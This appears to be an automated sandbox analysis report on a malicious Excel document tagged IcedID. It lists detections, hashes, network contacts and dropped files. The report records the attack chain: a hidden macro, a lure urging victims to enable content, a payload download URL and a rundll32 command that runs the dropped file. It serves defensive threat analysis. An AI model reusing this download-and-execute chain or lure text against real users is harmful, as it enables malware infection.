Loading ...

Play interactive tourEdit tour

Analysis Report document-550193913.xls

Overview

General Information

Sample Name:document-550193913.xls
Analysis ID:356276
MD5:4107cd071635b4cc3689f77c688f57c3
SHA1:cf6dea64431b614757906f32d3d1f016b5afdbb5
SHA256:d49b40d468269f57fb87ea6ad7fd8bb303fbeb033dbd45fb4967c34c5dfbc2ed
Tags:bokbotIcedIDmacrosxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2560 cmdline: rundll32 ..\rieuro.vnt,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-550193913.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11dab:$e1: Enable Editing
  • 0x11e20:$e2: Enable Content
document-550193913.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148a2:$s1: Excel
  • 0x15906:$s1: Excel
  • 0x3802:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-550193913.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2404, ProcessCommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, ProcessId: 2560

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-550193913.xlsVirustotal: Detection: 9%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 208.91.199.118:443 -> 192.168.2.22:49165 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: helendunnosteopathy.co.uk
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.91.199.118:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.91.199.118:443
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: helendunnosteopathy.co.uk
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: document-550193913.xlsString found in binary or memory: https://helendunnosteopathy.co.uk/ds/2202.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownHTTPS traffic detected: 208.91.199.118:443 -> 192.168.2.22:49165 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-550193913.xlsInitial sample: EXEC
    Source: document-550193913.xlsOLE indicator, VBA macros: true
    Source: document-550193913.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: document-550193913.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal76.expl.evad.winXLS@3/11@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\ACDE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD519.tmpJump to behavior
    Source: document-550193913.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: document-550193913.xlsVirustotal: Detection: 9%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-550193913.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-550193913.xls10%VirustotalBrowse
    document-550193913.xls6%ReversingLabsDocument-Excel.Exploit.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    helendunnosteopathy.co.uk1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://helendunnosteopathy.co.uk/ds/2202.gif2%VirustotalBrowse
    https://helendunnosteopathy.co.uk/ds/2202.gif0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    helendunnosteopathy.co.uk
    208.91.199.118
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpfalse
              high
              https://helendunnosteopathy.co.uk/ds/2202.gifdocument-550193913.xlsfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                208.91.199.118
                unknownUnited States
                394695PUBLIC-DOMAIN-REGISTRYUSfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:356276
                Start date:22.02.2021
                Start time:20:35:25
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 4m 55s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:document-550193913.xls
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.evad.winXLS@3/11@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                • Report size getting too big, too many NtDeviceIoControlFile calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Trojan.Packed2.42850.3598.exeGet hashmaliciousBrowse
                • 208.91.199.225
                SecuriteInfo.com.Trojan.Inject4.6572.1879.exeGet hashmaliciousBrowse
                • 208.91.199.224
                ffkjg5CVrO.exeGet hashmaliciousBrowse
                • 208.91.199.223
                7Lf8J7h7os.exeGet hashmaliciousBrowse
                • 208.91.199.223
                Shipping Details_PDF.exeGet hashmaliciousBrowse
                • 208.91.198.143
                YKRAB010B_KHE_Preminary Packing List.xlsx.exeGet hashmaliciousBrowse
                • 208.91.199.225
                RTM DIAS - CTM.exeGet hashmaliciousBrowse
                • 208.91.198.143
                AWB & Shipping Doc.exeGet hashmaliciousBrowse
                • 208.91.199.223
                AWB & Shipping Doc.exeGet hashmaliciousBrowse
                • 208.91.199.223
                PAYMENT INVOICE-9876543456789.exeGet hashmaliciousBrowse
                • 208.91.199.224
                SecuriteInfo.com.Artemis249E62CF9BAE.exeGet hashmaliciousBrowse
                • 208.91.198.143
                SecuriteInfo.com.Exploit.Siggen3.10204.3307.xlsGet hashmaliciousBrowse
                • 103.50.162.157
                document-573042818.xlsGet hashmaliciousBrowse
                • 103.50.162.157
                document-573042818.xlsGet hashmaliciousBrowse
                • 103.50.162.157
                document-573042818.xlsGet hashmaliciousBrowse
                • 103.50.162.157
                document-750895311.xlsGet hashmaliciousBrowse
                • 103.50.162.157
                19_02_2021.exeGet hashmaliciousBrowse
                • 111.118.215.254
                inquiry.docGet hashmaliciousBrowse
                • 208.91.199.224
                SecuriteInfo.com.Artemis1A08A3826D57.exeGet hashmaliciousBrowse
                • 208.91.199.225
                BL COPY.exeGet hashmaliciousBrowse
                • 208.91.198.143

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                7dcce5b76c8b17472d024758970a406bdocument-1915351743.xlsGet hashmaliciousBrowse
                • 208.91.199.118
                SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                • 208.91.199.118
                Subconract 504.xlsmGet hashmaliciousBrowse
                • 208.91.199.118
                upbck.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                IMG_6078_SCANNED.docGet hashmaliciousBrowse
                • 208.91.199.118
                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                _a6590.docxGet hashmaliciousBrowse
                • 208.91.199.118
                Small Charities.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                quotation10204168.dox.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                notice of arrival.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                22-2-2021 .xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                Shipping_Document.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                Remittance copy.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                CI + PL.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                • 208.91.199.118
                124992436.docxGet hashmaliciousBrowse
                • 208.91.199.118
                document-1900770373.xlsGet hashmaliciousBrowse
                • 208.91.199.118
                AswpCUetE0.docGet hashmaliciousBrowse
                • 208.91.199.118
                EIY2otZ3r8.docGet hashmaliciousBrowse
                • 208.91.199.118
                Invoice.pptGet hashmaliciousBrowse
                • 208.91.199.118

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):893
                Entropy (8bit):7.366016576663508
                Encrypted:false
                SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                Malicious:false
                Reputation:high, very likely benign file
                Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.0824531991978708
                Encrypted:false
                SSDEEP:6:kK1c4wPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:m1W3kPlE99SNxAhUeo+aKt
                MD5:9112B408D189084239739EAE8118F62F
                SHA1:7EE8197E23024152C459FF68ACB000A7D888612D
                SHA-256:ADA71E0ADDC1FF4AA299127CB136914DDD6CD69AAF84E72DB0500A6D804F0D8B
                SHA-512:7979D21F8E899121443AFE0D5E886118D70ADCC91B6B2CFD2258BFA41F4C353EBEA4F625180DB160910E879A696C892372D06E9E64E4C9AAB9AF086788B55484
                Malicious:false
                Reputation:low
                Preview: p...... .........."Y....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):252
                Entropy (8bit):3.0139867481437155
                Encrypted:false
                SSDEEP:3:kkFklf9kkltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKOfnliBAIdQZV7eAYLit
                MD5:28DE676481E9713D8E60012F0719B676
